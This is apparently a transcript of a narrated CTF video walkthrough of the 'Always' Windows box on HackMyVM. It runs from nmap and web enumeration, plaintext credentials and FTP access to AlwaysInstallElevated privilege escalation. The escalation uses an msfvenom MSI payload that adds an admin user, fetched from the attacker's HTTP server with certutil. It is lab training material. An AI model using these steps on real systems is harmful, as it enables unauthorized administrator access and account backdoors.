Okay, so everybody, this is a guided walkthrough for the Always challenge. This is a Windows CTF box that is hosted over at HackMyVM.eu. So the first thing we want to do when we do these CTF box challenges is we want to figure out where exactly on the network the boxes are. So what we can do is we can run an nmap scan on the IP range and figure out where the machine is. So it's nmap-sn on this network range. So this is going to figure out which machines are online in this particular network. Okay, so it looks like aside from our own machine, which is machine number 5, the only other machine that is up and is a virtual machine is this 16 machine over here on 192, 168, 216. So this is the IP address we're going to be hacking against. Okay, so what we're going to do is we're going to run another nmap scan on this particular IP address. We're going to specify a number of different arguments to get the best results. So what are we going to do here? So we're running nmap against all the ports, which is this argument here, and we're going to do common scripts and versioning information against whatever services we find with this argument here. We're going to run it very verbose, which means we're going to get output on our scan before the scan is over with this argument here, and we're going to run it very, very fast with this argument here. And the last thing we need to supply is the IP address. So let's run the scan. Okay, so what do we see here? So we've got a number of different ports that point at this being a Windows box. So these ports here, 139, 445, and a number of ports on the 40,000 range. These are very, very telltale signs that this is a Windows server that we're dealing with. And what we can do from here is we can check out some of the services that are being offered here. So there's port 21, which is FTP, and there's also port number 8080, which usually runs some sort of HTTP proxy, but we're going to try investigating it in another tab here. So here we know that what is the IP address again? It's this on port 8080. Okay, let me copy this. Okay, so this is port 8080, and we're going to try to do some enumeration. First, what we're going to do is, so we're going to run this program over here to determine what endpoints are available on this web port over here. So the web port is 8080. The program is derb. Let's run the let's run the program. Okay, so let's see. Okay, we need to supply the HTTP over here. Okay. Okay, so it looks like there is an admin endpoint that we've located on the box. And what we're going to do is we're going to navigate over to that admin endpoint. So let's go ahead and move over there. What's the IP address again? It is this over here. Okay, let me copy that. Then go over to our web browser. In the web browser, we're going to, so the landing page says, our site is under maintenance, please come back again later. So there's nothing really interesting inside of the HTTP source, but let's go ahead and go over to the admin endpoint. Okay, so this seems to be some sort of login page. So on these login pages, on most pages, there might be some sort of hints on inside of the HTTP source. So we can right click on the page and then view the page source. And there might be some sort of comments or something in the code that we could use to our advantage. So over here, there are credentials. So the admin and the password admin pass123. So it seems like they've supplied the admin password inside of the code, so that we can copy this and then we can log in. So the username is going to be admin and the password is going to be admin pass123. Click on login. And then we see here that once we've logged in, there's a note. So the admin's notes over here is this string, and this string, I'm fairly confident this is base64 encoding. So this is basically some other piece of information that has been encoded into base64. So the way we can tell is base64 uses a very specific character set. So it's uppercase and lowercase letters and numbers. And the most telltale sign is that sometimes you'll see equal signs at the end of the string. So what we can do is we can just copy this string, and then over on our terminal, we can echo out that string and then pipe it into base64 and decode it. So echo out the string that we found on the admin page, pipe it into base64 with the decode flag, and then it says FTP user keep going bro, exclamation point, exclamation point. Okay, so what can we do with this? Oh, another thing that we could take a look at is we could do some further web enumeration. We could use Nikto. So Nikto is a web app vulnerability scanner. Let's see, this is 16. And of course we have to specify that this is the 8080 port, because there's no port on the regular HTTP port, which is port 80. We have to specify that this is port 8080 in this fashion here. Okay, so we can use Nikto to try to see if it can find any obvious security flaws with the server on this IP address. So we're going to see here that it identifies this as an Apache server on Windows 64, 64-bit. That's what I assume that's going to be. Okay, so it finds the admin endpoint over here. Oh, you know what? Hold on. Okay. So we spotted the FTP service when we did our Nmap scan. So we did our Nmap scan over here. We noticed that there was a port, an FTP service on port 21 TCP. And what we can do now that we have these credentials over here, these ones, FTP user keep going bro, is we can access FTP with these credentials. So all we need to do that is just do FTP and then the IP address, 192.168.200, and is this 18 or 16? This is 16. All right, so we can log in to this FTP service with this username, FTP user, and this password keep going bro. So we are FTP user, and the password, I'm just going to copy and paste it. Okay, we're logged in, and we need to figure out what is on this FTP server. So it says here that in here there is robots.txt. So we can download this file with the get command. So just get robots.txt and transfer complete. So another little trick we could try is we could try to escape this directory with cd ... So sometimes the FTP is configured so badly that we can escape the current directory by doing cd ... This is not the case for this box, but it's just a little trick just in case you want to use it on some other CTF box. Okay, let's get out of here. And we see that there's the robots.txt directory over here. Sorry, the file. And let's go ahead and read that file. Okay, so it says user agent disallow this admin secret page xxx.html. So this is an endpoint. So we can actually try to access this page on the web server. Just copy it over. Then over here, we're going to paste in the endpoint. So we've got admin secret notes over here. It says disable the firewall in Windows Defender, enable FTP and SSH, start the Apache server, and don't forget to change the password for user always. Current password is this over here. Change the password for user always. Current password is this. So this looks like another base64 encoded string, so we can just copy this. And we can try decoding this over on the terminal. So we can do echo and into base64 decode. We're going to paste in the string over here. And it says, you can't find me. Interesting. All right, so let's reveal what is actually going on in this box. So what's going on in here is we have to use an unusual method to access the box, and that is direct access. So this challenge's intended solve method is to directly access the virtual machine and log in as the FTP user and complete the challenge there. So over here, let me make the virtual machine nice and big. So we've got the virtual machine here, and what we need to do is we need to interact with this virtual machine as if we had physical access to it and log in as the FTP user. So we've got FTP user, we can click on this and we can log in using the FTP user's password. So we previously captured it, and it's keep going bro and with 3 exclamation points. So another problem that we have to get around when we're dealing with this box is that this is a Turkish language installation of Windows. So we need to change the keyboard language here. Hold on. Okay. So what we can do, we can actually change the keyboard language by going up to the top left corner over here. So we can change it from Turkish, and we can change it over to English American with this option here. After that, we can punch in the password. So if we try to do this before we change it over to English, so say that we're doing Turkish, and we put in the password, keep going bro, triple exclamation point, it's going to say it's the wrong password. And the reason why it says it's the wrong password is because the exclamation point is in the wrong place, is in a different place on Turkish keyboards. So we need to change our keyboard to English. So we can go ahead and change our keyboard to English, then try that password again. Keep going bro, 3 exclamation points, and then click on login. Is that password correct? Let me check it one more time. Keep going bro, 2, 3 exclamation points, login. Okay. So I do not speak Turkish, so what I'm going to do is I'm just going to close out all these windows. So whenever I see a message, and I'm just going to close out the window. All right, so we have access as the FTP user on this Turkish version of Windows 7. What we're going to do is we're going to open up a command line. So I'm going to go over to this icon, and then in the search bar, I'm going to type in CMD, which is going to bring up the command prompt here. I'm going to open this up, and the command prompt is nice and big. Okay, this is what I want. So what we can do is we can, from here, we're going to do our privilege escalation. So we can do who am I? Who am I? Oh, okay, so who am I is not installed on here. That's fine. We know that we're the FTP user. We can do a little bit of snooping around. We can go into the, oh, we need to change our keyboard. So we can change our keyboard again by going down to the bottom and then pressing on this button over here, which says TR, and then we can change it over to English with this button here. Okay, so we can do, what was I trying to do? Who am I? Ah, okay, we're an FTP user, great. And let's move into C users and see what users exist over here. So there's the administrator user, the always user, the default app pool user, the FTP user, and the public directory. All right, so let's talk about how we're going to do privilege escalation on this box. So privilege escalation, always install elevated. So always install elevated is a Windows OS system policy that allows Windows installer packages, that is MSI files, to run with admin privileges even if a non-admin user initiates the installation. So we can check for always install elevated setting in the Windows system registry with a couple of different commands. And if we see that this setting, the setting always install elevated is this value here, which is 0x1 or true, then it's going to be vulnerable to this method of privilege escalation. Okay, so let's go ahead and check for that. So over here, we have to run two different commands. So the first command is going to be regquery, regquery hkcu /software /policies /microsoft /windows /installer /v always install elevated. Okay. Okay. So we see here that always install elevated under the HKCU is enabled. This is 01, which that means enabled. We're going to give the same command, but instead of HKCU, it's going to be HKLM. So these are two different registries over here. And we see the other always install elevated is also set to true. So that means that this system is vulnerable to always install elevated privilege escalation. Let's talk a little bit more about how we would exploit this. Whoops, over here. No, close this. Here. Okay, so what we can do is we can use MSF-Venom to create a malicious.msi file. And that file is going to create a new user with admin level access, which we can use to log into the system. So the MSF-Venom program, let's go ahead and create the malicious file. So we're just going to do MSF-Venom, and we're going to do Windows add user. So basically what the payload is going to do is it's going to add a user to Windows. And the username is going to be, let's call this HackerFrog. we're going to make the HackerFrog user, and we're going to set a password for the HackerFrog user to HackerFrog, like this. Okay. And we're going to set the format. It's going to be an MSI file, and we're going to output it to always.msi. Okay. So we're going to run this msfnm file command. It's going to create a malicious MSI file called always.msi, which we can upload and then run on the target. And because it has the AlwaysInstallElevated permission on the target, it's going to install this with admin level privileges, which means we're going to create our new user, HackerFrog, which has admin level access. Okay, so we create the file. Okay, so now we now have the always.msi malicious file in here, and we're going to upload it using FTP. So we're just going to go, let's just do FTP. We're going to log in as the FTP user, and the password is keep going bro, triple exclamation point. Okay, so from here, we've got robots.txt over here. We're going to upload the always.msi. So it's going to be put space always.msi. Okay, so let's see if it successfully uploaded. I wonder why this didn't transfer over. Okay, you know what? What we can do is we could try getting the actually, wait, we need to switch. Oh, sorry. What we need to do is we need to switch over to binary mode to upload files, because this is a binary file. So we can do FTP binary, and then we can try putting that file onto the file system again. It didn't work again. Okay. So let's see. How are we going to transfer it over? I guess we could try transferring it over to via FTP. No, via HTTP. So we're going to get out of here, and we're going to start up our Python HTTP server. So Python module, HTTP server 80. And what this Python module is going to do is it's going to start up a HTTP server on our attacker box port 80. And from there, we can download the file to our target. So let's go ahead and start that. And then we're going to go back to our box here. And I'm going to move into the public directory. So cd users public. The reason why I'm moving into the public directory is that the public directory usually has looser file permissions. We can usually download files to this directory. So we see here that this is the contents of the public directory. And let's try downloading to the target. We have to use the certutil command on Windows, and I kind of forget what the syntax is for that. Let me grab my notes. Just a second. Okay, so we can use certutil to download the file. Let me clear, and let's use this command here. So it's going to be certutil URL cache -f, and then our attacker box IP address. So 192. Ooh. I didn't have my my numlock on. Certutil URL cache -f HTTP 192.168.205 I think is my IP address, and we're uploading always.msi as always.msi. Whoops. always.msi. Okay. So we run that command, and then I can't read that. Let's see if it downloaded correctly. So we'll check the contents of the directory here. We have always.msi here. Great. Okay, so we can go ahead and before we finish this off, what we need to do is we need to go over to we're gonna use the file explorer. So we're just gonna go over to I don't know. Which one is this computer? I can't read any of this. Okay, C drive, and then users. Wait, is the users directory not visible? I think I can manually navigate to the users directory here. Users. And then we can click on public. I think this is public. Okay, and we've got the always MSI file over here. We can double click it, and this is going to run the file. It says there's a problem with this Windows installer package. A script required to install this complete could not be run. Check, please contact your support personnel or package vendor. That's fine. Just because we see an error message doesn't mean that something didn't run successfully. So let's go ahead and log out of here. So I'm not too sure which one is log out. Which I'm gonna look this up on Google Translate. So translate google.com from English to Turkish. English to Turkish. User log out. So it looks like this. I'm going to look for something that looks like this. And let's go ahead. Okay, so is it this one? Okay, I think I logged out. So now we see that there is this other user over here called HackerFrog that exists on the system now. So this should be an administrator level user that we can use to get administrator level access and to complete the challenge. Okay, so we're going to click on this button over here to change our keyboard from Turkish to English, and then we're going to click on the HackerFrog user, and we're going to input our password. And I don't remember what the password was. Let me look that up real quick. The password was HackerFrog, like this. Okay, let me go ahead and put that in. So the password is okay, I'm logging in. Awesome. All right. Okay, now I'm going to change the language from Turkish to English preemptively, and then I'm going to go over to the command. Actually, wait, I don't. Well, I mean, I don't need to, but I'm just going to make sure that I have admin level access. So I think I need to increase the font size. Oh, that didn't do it. Hold on. It sure is fun interacting with foreign language versions of Windows. Is it like this? No. Okay. Anyways, it might be a little hard to see, but I'm going to give this command here. It is, it's changed back to Turkish. Okay. So it's whoami/priv. Oh, wow. Actually, I'm looking for whoami, so I'm going to clear this out. whoami/groups. Okay, so we are in the administrators group, which means we should be able to access any files on the target. All right, so let's go ahead and open up the File Explorer. We're going to go over to C. Oh, it changed over to Turkish again. English, C users administrator, and we're going to go to the desktop directory. Can I go to desktop? Okay, and we see here's the root.txt file that we're supposed to access to finish the challenge. Okay, so we're not going to open up this. We're not going to open this up, but we are going to. Oh, I can't read any of this. Let me go ahead and go to C users administrator desktop. Okay, root.txt is here. If we can access this flag, or we can prove that we can access the flag, we win the challenge. So we do type root.txt and we redirect that into I read root.txt. So if we can create this file, that means we've essentially read the root.txt file and we've completed the challenge. Okay. So I read root.txt is here, so we've finished the challenge. But let's bring out our good friend Scary Hacker Voice Guy to talk about what we used to compromise the machine. So let me change my, let me call Scary Hacker Voice Guy over here, and let's have him explain it.
Hey, it's me, Scary Hacker Voice Guy. Scary Hacker Voice Guy comes out every time we break into a server or compromise it. And let me tell you, Mr. Always Administrator, it's not a very good idea to leave credentials lying around on your web pages and then leaving FTP access. And you know what? It's really weird to ask people to log into the machine physically and then do some mucking around, but we did it. Maybe you knew about these vulnerabilities, including the AlwaysInstallElevated access on the system, but maybe you decided to accept the security risk. Well, you accepted the risk. And now we're in.
Okay, so everybody, we've finished the box. We're able to get access to the root.txt file by creating a new admin level user on the box called HackerFrog. Anyways, this was a guided walkthrough for the Always machine that is hosted on the HackMyVM.eu website. And if you enjoyed this guided CTF walkthrough for Windows machines, please leave a like and subscribe on the video and leave a comment underneath the video. But until next time, HackerFrogs out.
Hey there, HackerFrogs! Are you enjoying this workshop? Learning new concepts and skills? If so, there's a way you can support the channel, and it's totally free. Just click on the subscribe button below the video. Also, click on the like button. And if you have questions or comments on this workshop, please leave them below the video. Thanks for listening. And now, back to our scheduled programming.